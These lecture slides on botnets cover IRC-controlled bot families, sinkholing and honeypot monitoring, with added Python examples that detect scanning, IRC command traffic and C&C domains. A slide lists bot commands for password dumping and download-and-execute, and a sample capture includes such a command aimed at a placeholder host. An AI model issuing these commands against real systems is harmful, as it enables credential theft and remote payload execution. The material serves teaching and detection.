CAP6135: Malware and Software Vulnerability Analysis
Botnets
Cliff Zou
Spring 2014
Acknowledgement
This lecture uses some content from the lecture notes of:
Dr. Dawn Song: CS161: computer security
Richard Wang – SophosLabs: The Development of Botnets
Randy Marchany - VA Tech IT Security Lab: Botnets
Botnets
Collection of compromised hosts
Spread like worms and viruses
Once installed, respond to remote commands
A network of ‘bots’ (robot: an automatic machine that can be programmed to perform specific tasks)
Also known as ‘zombies’
Platform for many attacks
Spam forwarding (70% of all spam?)
Click fraud
Keystroke logging
Distributed denial of service attacks
Serious problem
Top concern of banks and online merchants
Vint Cerf estimated that up to ¼ of hosts connected to the Internet may be bots
What are botnets used for?
IRC (Internet Relay Chat) based Control
Why IRC?
IRC servers are:
freely available
easy to manage
easy to subvert
Attackers have experience with IRC
IRC bots usually have a way to remotely
upgrade victims with new payloads to
stay ahead of security efforts
How bad is the problem?
Symantec identified a 400K-node botnet
A network administrator in the Netherlands discovered 1-2M unique IPs associated with Phatbot infections
Phatbot harvests machines already infected by MyDoom and Bagle (through the backdoors those worms leave open)
Researchers at Georgia Tech monitored thousands of botnets
Spreading Problem
Bot spreading (scanning for vulnerable hosts) is a leading cause of Internet background noise
Ports 445, 135, 139 and 137 (Windows SMB, RPC and NetBIOS) accounted for 80% of traffic captured by the German Honeynet Project
Other ports:
2745 – Bagle backdoor
3127 – MyDoom backdoor
3410 – Optix trojan backdoor
5000 – UPnP vulnerability
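The port share and scanning behaviour described above can be measured from flow records. The following is an added example written for this lecture, not code from the German Honeynet Project: it takes a constructed list of flows (timestamp in seconds, source IP, destination IP, destination port), reports the share of traffic per port, and flags sources that touch many distinct hosts on the worm/backdoor ports within a short window. The port labels are the ones on the slide; the scanner threshold and window are assumptions.

```python
"""Summarize honeynet background noise by destination port and flag scanning sources.

Added example for this lecture, not code from the German Honeynet Project.
Input is a constructed list of flow records (timestamp in seconds, source IP,
destination IP, destination port); port labels come from the slide above,
the scanner thresholds are assumptions.
"""
from collections import Counter, defaultdict

# Ports named on the slide: Windows RPC/NetBIOS/SMB (worm targets) and
# backdoors left by earlier worms, which later bots "harvest".
PORT_LABELS = {
    445: "SMB", 135: "MS-RPC", 139: "NetBIOS session", 137: "NetBIOS name",
    2745: "Bagle backdoor", 3127: "MyDoom backdoor",
    3410: "Optix trojan backdoor", 5000: "UPnP",
}
WINDOWS_NOISE_PORTS = {445, 135, 139, 137}
SCAN_TARGET_THRESHOLD = 8   # assumed: distinct targets on bot ports ...
WINDOW_SECONDS = 60         # ... within this many seconds marks a scanner


def port_share(flows):
    """Fraction of all flows per destination port, highest first."""
    counts = Counter(port for _, _, _, port in flows)
    total = sum(counts.values())
    return [(port, PORT_LABELS.get(port, "other"), n / total)
            for port, n in counts.most_common()]


def windows_noise_fraction(flows):
    """Share of flows aimed at 445/135/139/137 (the slide's 80% figure)."""
    hits = sum(1 for *_, port in flows if port in WINDOWS_NOISE_PORTS)
    return hits / len(flows)


def find_scanners(flows):
    """Map source IP -> peak number of distinct hosts it touched on bot ports
    inside any WINDOW_SECONDS window, for sources at/above the threshold."""
    per_src = defaultdict(list)
    for t, src, dst, port in flows:
        if port in PORT_LABELS:
            per_src[src].append((t, dst))
    scanners = {}
    for src, events in per_src.items():
        events.sort()
        peak = 0
        for i, (t0, _) in enumerate(events):
            # every event inside the window that starts at t0
            distinct = {dst for t, dst in events[i:] if t - t0 <= WINDOW_SECONDS}
            peak = max(peak, len(distinct))
        if peak >= SCAN_TARGET_THRESHOLD:
            scanners[src] = peak
    return scanners


# Constructed sample: one host sweeping 445 and 135 across a /24, a file
# server talking repeatedly to a single peer, a MyDoom-backdoor probe, and
# one ordinary web flow.
SAMPLE_FLOWS = (
    [(t, "198.51.100.77", f"10.0.0.{t}", 445) for t in range(1, 11)]
    + [(t, "198.51.100.77", f"10.0.0.{t}", 135) for t in range(1, 6)]
    + [(30 * t, "203.0.113.5", "10.0.0.1", 445) for t in range(1, 6)]
    + [(12, "192.0.2.9", "10.0.0.3", 3127), (13, "192.0.2.9", "10.0.0.4", 3127)]
    + [(20, "192.0.2.40", "10.0.0.3", 80)]
)

if __name__ == "__main__":
    for port, label, share in port_share(SAMPLE_FLOWS):
        print(f"{port:5d} {label:22s} {share:5.1%}")
    print("Windows-port noise:", f"{windows_noise_fraction(SAMPLE_FLOWS):.1%}")
    print("scanners:", find_scanners(SAMPLE_FLOWS))
```

The distinct-target count is what separates a scanning bot from a busy but legitimate source: the file server in the sample sends as many SMB flows as the sweep but to one host only. On real honeynet data the threshold has to be tuned against the local address density.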
Most commonly used Bot families
Agobot
SDBot
SpyBot
GT Bot
Agobot
Most sophisticated
20,000 lines of C/C++ code
IRC based command/control
Large collection of target exploits
Capable of many DoS attack types
Shell encoding/polymorphic obfuscation
Traffic sniffers/key logging
Defend/fortify compromised system
Ability to frustrate disassembly
SDBot
Simpler than Agobot, 2,000 lines of C code
Base code is non-malicious (a plain IRC bot)
Uses IRC-based command/control
Easily extended for malicious purposes
Scanning
DoS Attacks
Sniffers
Information harvesting
Encryption
SpyBot
<3,000 lines of C code
Possibly evolved from SDBot
Similar command/control engine
No attempts to hide malicious purposes
GT Bot
Functions based on mIRC scripting
capabilities
HideWindow program hides bot on local
system
Basic rootkit function
Port scanning, DoS attacks, exploits for
RPC and NetBIOS
Variance in codebase size, structure,
complexity, implementation
Convergence in set of functions
Possibility for defense systems effective across bot
families
Bot families extensible
Agobot likely to become dominant
All of the above use IRC for command/control
Disrupt IRC, disable bots
Sniff IRC traffic for commands
Shut down channels used by botnets
IRC operators play central role in stopping
botnet traffic
But a botnet could use its own IRC server
Automated traffic identification required
Future botnets may move away from IRC
Move to P2P communication
Traffic fingerprinting still useful for identification
Control
Host control
Fortify system against other malicious attacks
Disable anti-virus software
Harvest sensitive information
PayPal, software keys, etc.
Economic incentives for botnets
Stresses need to patch/protect systems prior
to attack
Stronger protection boundaries required
across applications in OSes
Example Botnet Commands
pstore
Display all usernames/passwords stored in
browsers of infected systems
bot.execute
Run executable on remote system
bot.open
Reads file on remote computer
bot.command
Runs command with system()
http.execute
Download and execute file through http
ftp.execute
ddos.udpflood
ddos.synflood
ddos.phaticmp
redirect.http
redirect.socks
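The defensive idea on the earlier slides (sniff IRC traffic for commands, identify botnet traffic automatically) can be tried against the command vocabulary listed above. Below is an added example written for this lecture, not code from the slides or from any bot: it parses raw IRC protocol lines and flags channel messages, and also channel topics, whose body starts with one of the Agobot-style command families. The sample capture, nicks and addresses are constructed.

```python
"""Pick botnet commands out of a captured IRC stream.

Added example for this lecture, not code from the slides or from any bot.
Assumes the capture is a list of raw IRC protocol lines (RFC 1459 framing)
and that bot commands use the Agobot-style names listed above; the sample
capture, nicks and addresses are constructed.
"""
from dataclasses import dataclass, field

# Command families from the slides; bots usually prefix them with '.' or '!'.
BOT_COMMAND_PREFIXES = ("bot.", "ddos.", "http.", "ftp.", "redirect.", "pstore")


@dataclass
class IrcMessage:
    prefix: str            # "nick!user@host" or a server name, may be empty
    command: str           # verb such as PRIVMSG, or a numeric such as 332
    params: list = field(default_factory=list)
    trailing: str = ""     # text after " :", where chat and commands live


def parse_irc_line(line):
    """Split one IRC line into prefix, command, middle params and trailing text."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        raise ValueError("empty IRC line")
    return IrcMessage(prefix, parts[0].upper(), parts[1:], trailing if sep else "")


def looks_like_bot_command(text):
    """True when a message body starts with one of the known command families."""
    token = text.strip().lstrip(".!").lower()
    return token.startswith(BOT_COMMAND_PREFIXES)


def detect_c2(lines):
    """Return (how, sender, channel, command) for each suspected bot command.

    Commands arrive as channel messages from the botmaster, or sit in the
    channel TOPIC (delivered as numeric 332 on join) so newly infected
    bots pick them up as soon as they connect."""
    alerts = []
    for line in lines:
        try:
            msg = parse_irc_line(line)
        except ValueError:
            continue
        if msg.command not in ("PRIVMSG", "NOTICE", "TOPIC", "332"):
            continue
        if not looks_like_bot_command(msg.trailing):
            continue
        sender = msg.prefix.split("!")[0] or "?"
        channel = msg.params[-1] if msg.params else "?"   # last param names the channel
        alerts.append((msg.command, sender, channel, msg.trailing.strip()))
    return alerts


# Constructed capture: a bot joining, a command left in the topic, two
# botmaster commands, and ordinary chat in another channel.
SAMPLE_CAPTURE = [
    ":irc.example.net 001 xa3f9 :Welcome to the Internet Relay Network",
    ":xa3f9!bot@10.0.0.7 JOIN :#ch4n",
    ":irc.example.net 332 xa3f9 #ch4n :.ddos.synflood 192.0.2.10 80 600",
    ":alice!alice@198.51.100.5 PRIVMSG #general :did anyone see the game?",
    ":master!m@203.0.113.9 PRIVMSG #ch4n :.http.execute http://198.51.100.22/u.exe 1",
    ":master!m@203.0.113.9 PRIVMSG #ch4n :.pstore",
    ":bob!bob@198.51.100.6 PRIVMSG #general :yes, what a finish",
]

if __name__ == "__main__":
    for how, sender, channel, cmd in detect_c2(SAMPLE_CAPTURE):
        print(f"{how:8s} {sender:16s} {channel:10s} {cmd}")
```

Keyword matching of this kind is cheap and was effective against the families on the slides, but it is exactly what the later bots defeat: renamed commands, a password-protected private server, or an encrypted or P2P channel leave nothing for a signature to match, which is why automated traffic fingerprinting (connection patterns, timing, join behaviour) is the more durable approach.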
Current Botnet Control Architecture
Figure: a botmaster issues commands through several C&C servers, each of which relays them to its own group of bots
More than one C&C server
Spread all around the world
Botnet Monitor: Gatech KarstNet
Many bots use a Dyn-DNS name (cc1.com in the figure) to locate their C&C server
Figure: bots resolve cc1.com; once the name is hijacked it points at the KarstNet sinkhole instead of the attacker's C&C servers
Detect cc1.com by its abnormal DNS queries
KarstNet informs the DNS provider of cc1.com
DNS provider maps cc1.com to the Gatech sinkhole (DNS hijack)
All/most bots then attempt to connect to the sinkhole instead of the real C&C
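The sinkhole procedure above has two parts: a detector that picks the C&C name out of DNS query traffic, and the hijacked name that turns every bot's rendezvous into a census. The following is an added example for this lecture, not KarstNet's code. It works over a constructed DNS query log of (timestamp in seconds, client IP, queried name). The heuristic, a dynamic-DNS name queried by many distinct clients in one short burst, is an assumption standing in for KarstNet's own statistics; the dyn-DNS suffixes, thresholds and sinkhole address are placeholders.

```python
"""Find a C&C hostname from its DNS query pattern, then sinkhole it.

Added example for this lecture; it is not KarstNet's code. Input is a
constructed DNS query log of (timestamp in seconds, client IP, queried name).
The heuristic, a dynamic-DNS name queried by many distinct clients in a
short burst, is an assumption standing in for KarstNet's own statistics;
the dyn-DNS suffixes, thresholds and sinkhole address are placeholders.
"""
from collections import defaultdict

DYNDNS_SUFFIXES = (".dyn.example.net", ".ddns.example.org")  # assumed providers
SINKHOLE_IP = "192.0.2.254"      # assumed sinkhole address (TEST-NET-1)
MIN_DISTINCT_CLIENTS = 20        # assumed: a home dyn-DNS name has few clients
BURST_WINDOW = 300               # seconds
BURST_FRACTION = 0.5             # assumed: >= half of all queries in one window


def is_dyndns(name):
    return name.lower().endswith(DYNDNS_SUFFIXES)


def suspicious_names(queries):
    """Map name -> stats for dyn-DNS names queried by many clients in a burst."""
    by_name = defaultdict(list)
    for t, client, name in queries:
        by_name[name.lower()].append((t, client))
    flagged = {}
    for name, events in by_name.items():
        if not is_dyndns(name):
            continue
        clients = {c for _, c in events}
        if len(clients) < MIN_DISTINCT_CLIENTS:
            continue
        times = sorted(t for t, _ in events)
        peak, j = 0, 0
        for i, t0 in enumerate(times):      # sliding window over sorted times
            while j < len(times) and times[j] - t0 <= BURST_WINDOW:
                j += 1
            peak = max(peak, j - i)
        if peak / len(times) >= BURST_FRACTION:
            flagged[name] = {"clients": len(clients), "peak_burst": peak}
    return flagged


class Sinkhole:
    """Stands in for the DNS provider remapping flagged names (the 'DNS hijack')
    plus the listener that counts hosts which then show up expecting a C&C."""

    def __init__(self, flagged_names):
        self.flagged = {n.lower() for n in flagged_names}
        self.seen_bots = defaultdict(set)

    def resolve(self, name, real_answer):
        """What the provider now answers: the sinkhole for flagged names, else the real IP."""
        return SINKHOLE_IP if name.lower() in self.flagged else real_answer

    def accept_connection(self, name, client_ip):
        """A host connected to the sinkhole address while looking for `name`."""
        self.seen_bots[name.lower()].add(client_ip)

    def population(self, name):
        """Lower bound on the botnet size: distinct hosts that phoned home."""
        return len(self.seen_bots[name.lower()])


def build_sample_log():
    """Constructed query log: 40 bots phoning home within 200 s, one home
    dyn-DNS host queried occasionally, and a popular ordinary site."""
    log = [(1000 + 5 * i, f"10.1.0.{i}", "cc1.dyn.example.net") for i in range(40)]
    log += [(3600 * i, f"172.16.0.{i}", "home.dyn.example.net") for i in range(3)]
    log += [(600 * i, f"10.2.0.{i}", "www.example.com") for i in range(50)]
    return log


def run_sinkhole(log, real_answer="203.0.113.1"):
    """Flag names, hijack them, and count the bots that hit the sinkhole."""
    sink = Sinkhole(suspicious_names(log))
    for _, client, name in log:
        if sink.resolve(name, real_answer) == SINKHOLE_IP:
            sink.accept_connection(name, client)   # the bot now TCP-connects to us
    return sink


if __name__ == "__main__":
    print(suspicious_names(build_sample_log()))
    print("bots seen:", run_sinkhole(build_sample_log()).population("cc1.dyn.example.net"))
```

Two caveats a practitioner would add: the hijack only works with the DNS provider's cooperation, so the monitor sees exactly the names it has been able to get remapped, and the sinkhole count is a lower bound on the botnet, since bots behind one NAT collapse into one address and bots that are offline or hard-coded with an IP never appear.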
Botnet Monitor: Honeypot Spy
Security researchers set up honeypots
Honeypots: deliberately set up vulnerable machines
When a honeypot is compromised, closely monitor the malware's behavior
Tutorial: http://en.wikipedia.org/wiki/Honeypot_%28computing%29
When a compromised honeypot joins a botnet:
Passive monitoring: log all network traffic
Active monitoring: actively contact other bots to obtain more information (neighbor list, additional C&C servers, etc.)
Representative research paper:
A multifaceted approach to understanding the botnet phenomenon,
Abu Rajab, Moheeb and Zarfoss, Jay and Monrose, Fabian and Terzis,
Andreas, 6th ACM SIGCOMM conference on Internet measurement (IMC),
2006.
The Future Generation of Botnets
Peer-to-Peer C&C
Polymorphism
Anti-honeypot
Rootkit techniques